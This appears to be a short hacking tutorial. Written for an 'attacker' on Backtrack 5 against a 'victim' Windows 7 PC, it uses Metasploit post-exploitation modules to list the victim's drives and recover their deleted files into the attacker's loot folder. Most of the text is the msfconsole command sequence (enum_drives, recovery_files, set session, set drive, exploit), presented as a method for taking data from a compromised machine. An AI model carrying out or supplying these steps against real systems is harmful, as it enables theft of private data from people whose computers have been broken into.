This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. “pdf”) to recover deleted files with that extension. Or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).
Exploit Targets
Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Open your backtrack terminal and type msfconsole
Run the following command to list all the drives of victim PC
Now type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit
Run the following command to recover the deleted data of the Victim PC
(I am using H: drive in my case)
Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive h:
msf exploit (recovery_files)>exploit
Run the following command to save the deleted data on /root/.msf4/loot
Set files 1073777664,1073778688,1073779212
